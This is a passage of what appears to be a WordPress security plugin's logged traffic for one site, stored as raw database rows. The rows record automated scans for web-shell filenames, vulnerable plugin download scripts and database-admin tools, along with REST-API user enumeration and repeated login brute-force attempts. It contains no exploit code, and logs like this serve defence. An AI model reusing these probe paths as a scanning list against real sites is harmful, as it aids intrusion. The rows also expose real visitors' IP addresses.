113.120',342913400,'',0,1636624605.1269,55,'lA8Zrz1xak6TtGyi54XOvVYN','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.112.113.120',342913400,'',0,1636624605.1606,10,'lA8Zrz1xak6TtGyi54XOvVYN','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.112.113.120',342913400,'',0,1636624607.5535,100,'E9bxcBm8jJT5diQSICvglWzs','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/xichang/x.php'),('20.112.113.120',342913400,'',0,1636624614.6290,55,'iXJBaE0R2C9VoK6wTADuHYhm','','19|0|0|0|ashbooks.co.uk/wp-admin/shapes.php'),('20.112.113.120',342913400,'',0,1636624616.6905,55,'ZlqircL0DK4knQsX2w6bWFg3','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.112.113.120',342913400,'',0,1636624619.5101,55,'tzC5r4yVNlLDskqKbeZJQTUa','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.112.113.120',342913400,'',0,1636624625.1206,55,'G0sWMdElcax4peUCLZfn3Oo6','','19|0|0|0|ashbooks.co.uk/up.php'),('20.112.113.120',342913400,'',0,1636624627.4408,55,'EXWgOeUztHnphV9KTvJl504B','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.112.113.120',342913400,'',0,1636624632.9091,55,'0MeOb3qBkUwhxoCcVtNF7TSZ','','19|0|0|0|ashbooks.co.uk/shell.php'),('20.112.113.120',342913400,'',0,1636624635.4219,55,'vq1ds6Pc8RSIZnObVDEg3mlF','','19|0|0|0|ashbooks.co.uk/wp-admin/network/wp-footer.php'),('20.112.113.120',342913400,'',0,1636624637.6558,55,'oqxtLEYROCc8ZgAH19QIe647','','19|0|0|0|ashbooks.co.uk/wp-info.php'),('20.112.113.120',342913400,'',0,1636624639.7601,55,'evjsXgn3PrZ48xtQ12U0OhMW','','19|0|0|0|ashbooks.co.uk/wp-content/vuln.php'),('20.112.113.120',342913400,'',0,1636624642.1674,55,'3SABYEGZPtNCrLkn9FfliKdj','','19|0|0|0|ashbooks.co.uk/upel.php'),('20.112.113.120',342913400,'',0,1636624644.3613,55,'Ck8jTNKZXyUx0tgWBvSwJpl7','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ppus/up.php'),('20.112.113.120',342913400,'',0,1636624646.8480,55,'czdurD09WMpx2ZHneC56U13s','','19|0|0|0|ashbooks.co.uk/098.php'),('20.112.113.120',342913400,'',0,1636624649.1194,55,'MiBRCVp7OoFJQj43XWADHK6U','','19|0|0|0|ashbooks.co.uk/V5.php'),('20.112.113.120',342913400,'',0,1636624650.9725,55,'05r1xwven27KTLQcRNpXGMWO','','19|0|0|0|ashbooks.co.uk/new_license.php'),('20.112.113.120',342913400,'',0,1636624653.2249,55,'V8iwaLCXdKIRGo5DNeZsWBTH','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php'),('20.112.113.120',342913400,'',0,1636624655.9524,55,'GQxiPuCg0hsOalfvzFqrZKbH','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php'),('20.112.113.120',342913400,'',0,1636624672.6997,55,'3vDeRIYMpfkwAh9lXHNBng18','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.112.113.120',342913400,'',0,1636624675.0529,55,'pTh0vuR7W6UIlEgNtVZnmkbz','','19|0|0|0|ashbooks.co.uk/modules/modules/modules.php'),('20.112.113.120',342913400,'',0,1636624677.5693,55,'RtELe8ghJVunXmYvNCAosQbq','','19|0|0|0|ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php'),('20.112.113.120',342913400,'',0,1636624680.8769,55,'0M8gijHfZRUIPAXCTJnODwxB','','19|0|0|0|ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php'),('20.112.113.120',342913400,'',0,1636624683.0674,55,'1psE4HJO9Fvwqy7DRcMn2SL6','','19|0|0|0|ashbooks.co.uk/libraries/joomla/css.php'),('20.112.113.120',342913400,'',0,1636624685.2813,100,'IhRZr8WDzanwkiHLcT7oXq9p','','13|0|0|0|ashbooks.co.uk/libraries/joomla/jmails.php'),('20.112.113.120',342913400,'',0,1636624687.6310,100,'xBfqrYAbVHiztIQ7J4WS68kO','','13|0|0|0|ashbooks.co.uk/libraries/joomla/jmail.php'),('20.112.113.120',342913400,'',0,1636624690.1533,55,'bPU79ZjYAeVB4r0qukcmwSDh','','19|0|0|0|ashbooks.co.uk/images/vuln.php'),('20.112.113.120',342913400,'',0,1636624692.4699,55,'QmiK6qPre3FWubvJAl1aGsB7','','19|0|0|0|ashbooks.co.uk/tmp/vuln.php'),('20.112.113.120',342913400,'',0,1636624694.8521,55,'0BDzS58TlrJuAtFymhHZVj4I','','19|0|0|0|ashbooks.co.uk/XxX.php'),('20.112.113.120',342913400,'',0,1636624696.7916,55,'1h8qAtfC7cLm2E69sJa5BkPK','','19|0|0|0|ashbooks.co.uk/Marvins.php'),('20.112.113.120',342913400,'',0,1636624698.8647,100,'y6kJTznGVgQvqAaeNLoxOdIK','','13|0|0|0|ashbooks.co.uk/rxr.php'),('20.112.113.120',342913400,'',0,1636624701.2437,55,'sPHXBDUfr8ZnYb6zgQ9OAqGi','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.112.113.120',342913400,'',0,1636624703.9506,55,'pfg5XzZcubDIEh4Lx6i7KT3M','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.112.113.120',342913400,'',0,1636624706.4014,55,'BliDy2woWxtFYSZJIvCaqOc7','','19|0|0|0|ashbooks.co.uk/error.php'),('20.112.113.120',342913400,'',0,1636624708.7322,55,'Uqeu6tbS4moEALj5Fn08gfNc','','19|0|0|0|ashbooks.co.uk/RxR.php'),('20.112.113.120',342913400,'',0,1636624710.9666,55,'Cvg35OUJ0y9NqteGVXMdnRP8','','19|0|0|0|ashbooks.co.uk/components/com_b2jcontact/izoc.php'),('20.112.113.120',342913400,'',0,1636624714.8514,55,'bLRHojVaOG3I4MWApSUCmiy6','','19|0|0|0|ashbooks.co.uk/V3.php'),('20.112.113.120',342913400,'',0,1636624716.7025,55,'k5u4pqYrOUKQldAXHtILEz10','','19|0|0|0|ashbooks.co.uk/V5.php'),('20.112.113.120',342913400,'',0,1636624720.6800,55,'dRixna84MZfXOzTFksopBlgN','','19|0|0|0|ashbooks.co.uk/up.php'),('20.112.113.120',342913400,'',0,1636624722.8332,55,'eoTm3ty79uzJNscL6SdV2WKB','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.112.113.120',342913400,'',0,1636624725.1155,55,'1F9NSrkKJfGUjl6EV3YPcXsO','','19|0|0|0|ashbooks.co.uk/shell.php'),('20.112.113.120',342913400,'',0,1636624726.9891,55,'SWDl9GuymH0IBsYanU25Oket','','19|0|0|0|ashbooks.co.uk/administrator/templates/bluestork/index.php'),('20.112.113.120',342913400,'',0,1636624728.8566,55,'b8d9xCeRvlXY1nmB7DwkfoU2','','19|0|0|0|ashbooks.co.uk/administrator/templates/bluestork/error.php'),('20.112.113.120',342913400,'',0,1636624731.3203,55,'pQmsRFzv2dPWYBl7gLqKHjx9','','19|0|0|0|ashbooks.co.uk/administrator/templates/hathor/index.php'),('20.112.113.120',342913400,'',0,1636624733.3951,55,'Qv2TPBgKnfjRypwZVMthFC8l','','19|0|0|0|ashbooks.co.uk/administrator/templates/hathor/error.php'),('20.112.113.120',342913400,'',0,1636624735.1410,55,'nT5qHYplBDhNQPWM02A6yFJE','','19|0|0|0|ashbooks.co.uk/administrator/templates/isis/index.php'),('20.112.113.120',342913400,'',0,1636624737.4280,55,'dxgG7ZpMqU6YEXob1keHs5Aw','','19|0|0|0|ashbooks.co.uk/administrator/templates/isis/error.php'),('20.112.113.120',342913400,'',0,1636624739.5162,55,'NuKAJ9dryqV0Rs6pvH4CiSj5','','19|0|0|0|ashbooks.co.uk/templates/beez/index.php'),('20.112.113.120',342913400,'',0,1636624741.5888,55,'oFB7fEYKgOk2TNlZD9d3tzSh','','19|0|0|0|ashbooks.co.uk/templates/ja_purity/index.php'),('20.112.113.120',342913400,'',0,1636624743.6487,55,'IqKu9jMTsdEz4Uc2HPmp1N5r','','19|0|0|0|ashbooks.co.uk/templates/rhuk_milkyway/index.php'),('20.112.113.120',342913400,'',0,1636624745.7590,55,'p8DbMjC7KasnJo2l4vVcEWeL','','19|0|0|0|ashbooks.co.uk/templates/system/index.php'),('20.112.113.120',342913400,'',0,1636624747.8007,55,'ClLuJMjbGF2m4OIzy5VHX6Dw','','19|0|0|0|ashbooks.co.uk/templates/system/error.php'),('20.112.113.120',342913400,'',0,1636624750.6806,55,'JsxkfThqHvN6uMPlQU9cdGSI','','19|0|0|0|ashbooks.co.uk/templates/beez3/index.php'),('20.112.113.120',342913400,'',0,1636624752.7928,55,'vhFn50rgs1fQ6auoyW4IpBO2','','19|0|0|0|ashbooks.co.uk/templates/beez3/error.php'),('20.112.113.120',342913400,'',0,1636624754.6225,55,'nTSIWmjPZLbR2vUrYxwqgHVG','','19|0|0|0|ashbooks.co.uk/templates/beez5/index.php'),('20.112.113.120',342913400,'',0,1636624756.6808,55,'WIJQNozVPTvtCgn84RBXZif9','','19|0|0|0|ashbooks.co.uk/templates/beez5/error.php'),('20.112.113.120',342913400,'',0,1636624758.6645,55,'hGV1gxNItc8My3BnD4vjEP9i','','19|0|0|0|ashbooks.co.uk/templates/beez_20/index.php'),('20.112.113.120',342913400,'',0,1636624760.5169,55,'IM18CE94xaBQJuDeqwRm6yfc','','19|0|0|0|ashbooks.co.uk/templates/beez_20/error.php'),('20.112.113.120',342913400,'',0,1636624762.2236,55,'9bsxAYCQDGSIwqoM2VnmUOFE','','19|0|0|0|ashbooks.co.uk/templates/protostar/index.php'),('20.112.113.120',342913400,'',0,1636624763.9869,55,'UQy47V8hWtsgfKo6TurXR0BY','','19|0|0|0|ashbooks.co.uk/templates/protostar/error.php'),('20.112.113.120',342913400,'',0,1636624765.6732,55,'whNAC4qeJ9EWnyz01BSFoTX7','','19|0|0|0|ashbooks.co.uk/templates/atomic/index.php'),('20.112.113.120',342913400,'',0,1636624767.3375,55,'h4zq1ZWUBXf7KoygYcTP5NEG','','19|0|0|0|ashbooks.co.uk/templates/atomic/error.php'),('20.112.113.120',342913400,'',0,1636624769.4451,55,'BJUbs7Ya2m9iTqA3XjxQ60Zr','','19|0|0|0|ashbooks.co.uk/olux.php'),('20.112.113.120',342913400,'',0,1636624771.3609,55,'9BPGHC2hJiEtnZp1zuq5bc8e','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.112.113.120',342913400,'',0,1636624772.9590,55,'1GVO6n4l8jXaFKxIhv9boCZY','','19|0|0|0|ashbooks.co.uk/indoxploit.php'),('20.112.113.120',342913400,'',0,1636624774.6529,55,'3u5wcLMrobjRgtm8IHv1nyVX','','19|0|0|0|ashbooks.co.uk/wso.php'),('20.112.113.120',342913400,'',0,1636624796.7355,55,'Rn8rjAFCQ3GtcXVbmgWTzqx0','','19|0|0|0|ashbooks.co.uk/up.php'),('20.112.113.120',342913400,'',0,1636624798.3432,55,'HYLKfdOgTW05QCwzUbBZGeDF','','19|0|0|0|ashbooks.co.uk/upload.php'),('20.112.113.120',342913400,'',0,1636624800.1946,55,'d1MhzNLkHneCscmP6Ej0AZoV','','19|0|0|0|ashbooks.co.uk/shell.php'),('181.174.125.214',3048111574,'admin',0,1636624969.9332,7,'9AO6S2GnNDbUHjKYhmelLdIy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.248.233.244',1761143284,'admin',0,1636625830.1501,7,'YIgL5MwbNFP63We4ZlOfjdCB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636625974.1068,51,'TcAC8qpUZM0JfHBbGaglXdK9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.163.223.126',883154814,'admin',0,1636628173.6727,7,'Y5pgPEmtjsnVa8O7yX1CrKIS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628850.5442,55,'EMUPilyguSAJF0mkzxroGvQR','','19|0|0|0|ashbooks.co.uk/wp-admin/vuln.php'),('20.185.234.76',347728460,'',0,1636628858.6829,55,'RSKVvsCckfaurzA84TbgNPj2','','19|0|0|0|ashbooks.co.uk/wp-content/force-download.php'),('20.185.234.76',347728460,'',0,1636628859.1533,55,'jhGqayM4AxIt68ku7mFdeoUi','','19|0|0|0|ashbooks.co.uk/force-download.php'),('20.185.234.76',347728460,'',0,1636628859.8462,55,'dqoXWisTbuk7Mh1Ctv6IzJ89','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php'),('20.185.234.76',347728460,'',0,1636628860.5512,55,'7kMIuhRCQbPjt05GoT2epzWd','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php'),('20.185.234.76',347728460,'',0,1636628860.5745,10,'7kMIuhRCQbPjt05GoT2epzWd','','707|0|0|0|ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php'),('20.185.234.76',347728460,'',0,1636628861.6492,100,'d2gUtaOB4Vf1eY8FqCrNHRSL','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php'),('20.185.234.76',347728460,'',0,1636628862.0766,100,'a34byz8mqJKcOoeNgPCurFvE','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php'),('20.185.234.76',347728460,'',0,1636628862.6767,100,'vLu37Nr9GfJnKdeAjCzSHtQP','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php'),('20.185.234.76',347728460,'',0,1636628863.8162,100,'ZaV0LJ28QqI96GCXFHzeoku5','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php'),('20.185.234.76',347728460,'',0,1636628864.0824,100,'eQ5yOZ70v12AGsVkS3uCtMPT','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php'),('20.185.234.76',347728460,'',0,1636628864.7790,100,'AgWtFe7EqLc0iryUoJHbm4X8','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php'),('20.185.234.76',347728460,'',0,1636628866.3091,100,'5o8Akmw7LUgyYREzQZlFqM9t','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php'),('20.185.234.76',347728460,'',0,1636628866.4627,100,'vK5sS97wPmQlTIbZ06jNfipq','','13|0|0|0|ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php'),('20.185.234.76',347728460,'',0,1636628866.9964,100,'aQpMefyz4WY0AowdVORDgcqE','','13|0|0|0|ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php'),('20.185.234.76',347728460,'',0,1636628867.6910,100,'O2hZNW46FvfV87RHtjzYeBL0','','13|0|0|0|ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php'),('20.185.234.76',347728460,'',0,1636628868.6369,100,'rFKms0jUW1VYO4CJGtuSZR58','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php'),('20.185.234.76',347728460,'',0,1636628869.0776,100,'hPY7knvsQwWaRCH3LmDbu1gV','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php'),('20.185.234.76',347728460,'',0,1636628869.8662,100,'oIWLBJFtw3fjMAlzbkUD49Kc','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php'),('20.185.234.76',347728460,'',0,1636628870.5863,100,'UzVNwgSZb8q1PaXdxjEsye0G','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/db-backup/download.php'),('20.185.234.76',347728460,'',0,1636628871.6445,100,'yxm96Ui8dCzLc1lHawYoqBVW','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php'),('20.185.234.76',347728460,'',0,1636628872.5690,55,'UdFMCpjLBv4oqsryH0cl8Kz5','','19|0|0|0|ashbooks.co.uk/adminer.php'),('20.185.234.76',347728460,'',0,1636628873.0182,55,'RdTBijAHly5gpse1PGcLzI7S','','19|0|0|0|ashbooks.co.uk/wp-admin/mysql-adminer.php'),('20.185.234.76',347728460,'',0,1636628873.6778,55,'cAVE8XUfFQWB05Te2kw7JzgG','','19|0|0|0|ashbooks.co.uk/wp-admin/adminer.php'),('20.185.234.76',347728460,'',0,1636628874.4870,55,'M9UXnS7tVO1viQrsyWZflN0e','','19|0|0|0|ashbooks.co.uk/mysql-adminer.php'),('20.185.234.76',347728460,'',0,1636628875.4062,55,'oD2UsT5irjzMN0bu1ad6vBht','','19|0|0|0|ashbooks.co.uk/adminer/adminer.php'),('20.185.234.76',347728460,'',0,1636628876.7663,55,'mhjwatpNqGXiVLYxuFP9vDyQ','','19|0|0|0|ashbooks.co.uk/uploads/adminer.php'),('20.185.234.76',347728460,'',0,1636628877.4995,55,'sghCo5Ep6ctQk3ByOlDbnX7P','','19|0|0|0|ashbooks.co.uk/upload/adminer.php'),('20.185.234.76',347728460,'',0,1636628878.1631,55,'9AgmkJsTdUDeNOrCa0WBiEKf','','19|0|0|0|ashbooks.co.uk/adminer/adminer-4.7.0.php'),('20.185.234.76',347728460,'',0,1636628878.9499,55,'4pZyLch576ADfYxIriVNBlTM','','19|0|0|0|ashbooks.co.uk/wp-content/adminer.php'),('20.185.234.76',347728460,'',0,1636628879.7597,55,'OpbkIPqxRSCfly3zeh79WMHt','','19|0|0|0|ashbooks.co.uk/wp-content/uploads/adminer.php'),('20.185.234.76',347728460,'',0,1636628879.9138,55,'8egAtTuCHhIVyOXNqUKov9PD','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/adminer/inc/editor/index.php'),('20.185.234.76',347728460,'',0,1636628881.1154,55,'xO9fgpXnaYswVWQUZi1oP3Gc','','19|0|0|0|ashbooks.co.uk/_adminer.php'),('20.185.234.76',347728460,'',0,1636628881.9054,55,'utJM6HrDeAykBQSNfT28EqIG','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_mysql.php'),('20.185.234.76',347728460,'',0,1636628883.2567,55,'B45TZ679QabykMxKAO3VWJnF','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_425.php'),('20.185.234.76',347728460,'',0,1636628883.2989,55,'I3VLqPRyzeTwEi6tZF48uYBo','','19|0|0|0|ashbooks.co.uk/adminer/index.php'),('20.185.234.76',347728460,'',0,1636628884.0151,55,'mPVB1YNUW3fTbl9CFJDxwAa0','','19|0|0|0|ashbooks.co.uk/adminer1.php'),('20.185.234.76',347728460,'',0,1636628884.7076,55,'7N2LBUQaXim0xdckyEDvIPOT','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer_431.php'),('20.185.234.76',347728460,'',0,1636628886.1673,55,'SgbeUHtPOcE5oszW6xFpLNmI','','19|0|0|0|ashbooks.co.uk/mirasvit_adminer-4.2.3.php'),('20.185.234.76',347728460,'',0,1636628886.4702,55,'uzjiR3CWF14IUBx2mHVeAtwE','','19|0|0|0|ashbooks.co.uk/adminer-4.6.2-cs.php'),('20.185.234.76',347728460,'',0,1636628886.8998,55,'kvCaufZlgYFw2Jnr8LjQdz3T','','19|0|0|0|ashbooks.co.uk/adminer-4.5.0.php'),('20.185.234.76',347728460,'',0,1636628887.6216,55,'IMemiRAWsSxOld2Q9KzgHFc0','','19|0|0|0|ashbooks.co.uk/adminer-4.3.0.php'),('20.185.234.76',347728460,'',0,1636628888.6007,55,'U1GmaBPLtDYRNEXlAjkpVwvz','','19|0|0|0|ashbooks.co.uk/latest.php'),('20.185.234.76',347728460,'',0,1636628889.0542,55,'e28bC0UmMJkxnwVHg7fDtGKi','','19|0|0|0|ashbooks.co.uk/latest-en.php'),('20.185.234.76',347728460,'',0,1636628890.1028,55,'Hy7JgxFiGYWVtpAfNORdBo2E','','19|0|0|0|ashbooks.co.uk/latest-mysql.php'),('20.185.234.76',347728460,'',0,1636628891.3837,55,'inbu3O4R8KoFk1ejp6DZB0wr','','19|0|0|0|ashbooks.co.uk/adminer-4.7.0.php'),('20.185.234.76',347728460,'',0,1636628891.4723,55,'DPmKZQbyEnAqC6j0ifeOLBHc','','19|0|0|0|ashbooks.co.uk/latest-mysql-en.php'),('20.185.234.76',347728460,'',0,1636628892.6064,100,'yO7lhag2xYbRmACp63TJGNrM','','13|0|0|0|ashbooks.co.uk/'),('20.185.234.76',347728460,'',0,1636628893.6224,100,'ht8sCl3qOYKnxD4TwWpoRFug','','13|0|0|0|ashbooks.co.uk/'),('20.185.234.76',347728460,'',0,1636628896.4757,100,'cYKDotN8Wv3wpU2QIM6mPFbE','','13|0|0|0|ashbooks.co.uk/'),('20.185.234.76',347728460,'',0,1636628898.8367,100,'wbkLt6Oo5Mrji7hKXZQ8WH9C','','13|0|0|0|ashbooks.co.uk/'),('20.185.234.76',347728460,'',0,1636628900.0441,50,'FOkEcWpzYogwi02PRdGKlusB','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628902.7143,55,'yf7cRWzqv6BkiZwXlMTsaOgC','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),('20.185.234.76',347728460,'',0,1636628908.7975,70,'yoCLpO180MDjbX7dTgVw2YW5','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/posts/'),('20.185.234.76',347728460,'',0,1636628910.1157,70,'OdS3akiVN9Y04TXj5UoxbrQu','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/posts/None'),('20.185.234.76',347728460,'',0,1636628915.5390,55,'u2txR6A3KYhSbXswfOFUvgo7','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php'),('20.185.234.76',347728460,'',0,1636628919.6236,55,'NkEFwZ3t4jJ2ps1COgDrGLK8','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php'),('20.185.234.76',347728460,'',0,1636628921.0402,100,'cUlFBJvERWNVjuCZLa5KOT8x','','13|0|0|0|ashbooks.co.uk/wordpress/wp-admin/setup-config.php'),('20.185.234.76',347728460,'',0,1636628921.7028,100,'IPuksx2bO8r1JVCgUKvZBH0R','','13|0|0|0|ashbooks.co.uk/wp/wp-admin/setup-config.php'),('20.185.234.76',347728460,'',0,1636628922.5893,100,'iX9qQntxfeB10M4vAVOh5Hw3','','13|0|0|0|ashbooks.co.uk/blog/wp-admin/setup-config.php'),('20.185.234.76',347728460,'',0,1636628923.5101,100,'UOvXr2L8GjhZINbxdnV7sSA9','','13|0|0|0|ashbooks.co.uk/test/wp-admin/setup-config.php'),('20.185.234.76',347728460,'',0,1636628924.4283,100,'n81SAriYNH7u2WvjPR5Gaf4t','','13|0|0|0|ashbooks.co.uk/site/wp-admin/setup-config.php'),('20.185.234.76',347728460,'',0,1636628925.0996,100,'HxFfb3AjOCJY4Gz0Qs91ZriL','','13|0|0|0|ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php'),('20.185.234.76',347728460,'',0,1636628930.8229,70,'p1eOLQuHDmEnSCGroazNh03i','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('20.185.234.76',347728460,'',0,1636628931.1748,70,'jS4bKJcUEgTZPhkIvNaimyeY','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('20.185.234.76',347728460,'',0,1636628931.5426,70,'vypLPEG4OYWK9Xh8oSNMtqlr','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('20.185.234.76',347728460,'',0,1636628931.9149,70,'9XRe4ZwtJWUaimF1vYSr7sdy','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/4'),('20.185.234.76',347728460,'',0,1636628932.5084,70,'FWiSU0euvVcfIzOKmLAb1D9J','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/5'),('20.185.234.76',347728460,'',0,1636628932.8990,70,'UQVlMhPyr902zEcdNIRSTfjZ','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/6'),('20.185.234.76',347728460,'',0,1636628933.5987,70,'uZPiBQ7lsH9UhGfIk2jtKAn3','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/7'),('20.185.234.76',347728460,'',0,1636628933.9797,70,'tp5yc9m3EFVv6XfBnY0Ng1qS','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/8'),('20.185.234.76',347728460,'',0,1636628934.5815,70,'34LJTmE7UeM6ArNxcRfsHp5i','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/9'),('20.185.234.76',347728460,'',0,1636628934.9793,70,'dzaRCJANBSb5kZejI8iPqGsQ','','13|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/10'),('20.185.234.76',347728460,'',0,1636628936.9759,50,'SXPrtUkQexlcEVTgjZa8onBi','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628936.9984,50,'noEMlGt9gr6h1DOe8c7duzqm','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.0778,50,'kJEeWwq7Flonru9sf5BA4bYm','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.1225,50,'Lu4li3eW0kRbJaP9rXfphZnj','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.4491,50,'Z7uHcVfXaYgid5MG0LDW9QzA','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.4561,50,'2HcC9BoSNUG4DXZRumEnMyb3','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.5853,50,'ByMDhn9YxNApfSOcraUkoEFw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.7203,50,'myYrwkpB0HEhMQL53c4n8v71','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.8737,50,'93IP8cQMSYjWa4oVtXFzrdTU','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.9208,50,'qUn5w2dbeSIzvr7NjphmRiaC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628937.9978,50,'iQaojR40tJ8wygsX213xCHKB','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.0049,10,'93IP8cQMSYjWa4oVtXFzrdTU','','711|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.0588,50,'aGnXxgMN684V2pocjtSTwFLd','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.0709,50,'AjhZqV6EfsS2i4zYOwnRG8Qp','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.1133,50,'tUMHyujgFJoIs685rcWXSdlw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.4881,50,'lpuYQyR6Evs0ax7F5nMSHiTP','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628938.5105,50,'Z4aHgJoscPL9OyuAfQql7G1n','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.0635,50,'jtQKsBOhwcv8izqVAFToRglr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.4891,50,'6aeQZEiWp1wBRuTUnmtIySNv','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.5322,50,'3z4XstCpuReB6KoihSck1f7V','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.5404,50,'wxdXsu1L9oPGpDEectYOz20A','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.5692,50,'gxV3aoUbehd6KSyWkwXL5DpZ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.6844,50,'5wmBhPN4CYHqGtorZel2RLJV','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.7258,50,'GDPOW9kEHv1tUpi7bKqdxQge','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628939.9105,50,'oxmW4vq5EgCYL3GkzHbc6rlh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.5597,50,'fbXaQMW7HkemwU9Y8FJ5DGEh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.5965,50,'ctGFPxsWJUwrhinz0kSbYg95','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.6287,50,'ZYbCqFUD7So8GELOt4ji9xBc','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.6422,50,'18Cr6IitLOzupXAWJjcbmNFE','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'',0,1636628940.8100,50,'BADetcTYfn2bz9L60SMyj8O1','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.234.76',347728460,'